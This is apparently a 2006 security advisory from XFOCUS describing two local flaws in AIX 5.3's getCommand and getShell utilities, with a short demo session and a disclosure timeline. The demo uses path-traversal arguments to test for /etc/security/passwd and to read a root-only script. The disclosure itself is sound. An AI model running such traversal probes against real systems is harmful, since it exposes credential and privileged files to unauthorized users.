xfocus-SD-060101.txt

`Title:[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities  
  
Affected version : aix5.3 ml03,Other versions not test,  
should also be affected.  
Vendor: http://www.ibm.com/  
Where: Local  
  
XFOCUS (http://www.xfocus.org) had already discovered  
some vulnerabilities in getCommand&getShell.  
  
After apply newest patch,getCommand&getShell still have two  
vulnerabilities,That is  
1: exploit that,a attacker can determine file be exist or not,which  
should can't readed  
2: exploit that,a attacker can read in any shell document(include no  
permission file) has the cd operation the following partial content.  
  
example test:  
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd  
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa  
fopen: No such file or directory  
-bash-3.00$ ls -ld /etc/security/  
drwxr-x--- 4 root security 512 2005-12-22 21:09 /etc/security/  
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40  
/tmp/k.sh  
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh  
  
ps -ef > /tmp/log. $$  
grep test /tmp/log.  
$$ rm /tmp/log. $$  
  
-bash-3.00$  
  
  
TIME LINE:  
December,26 2005 - Initial vendor notification  
.....Waiting.....Waiting....  
January 1, 2006 - Public disclosure(vendor not reply)  
  
--EOF  
  
  
--   
  
Kind Regards,  
  
---  
XFOCUS Security Team  
http://www.xfocus.org  
  
`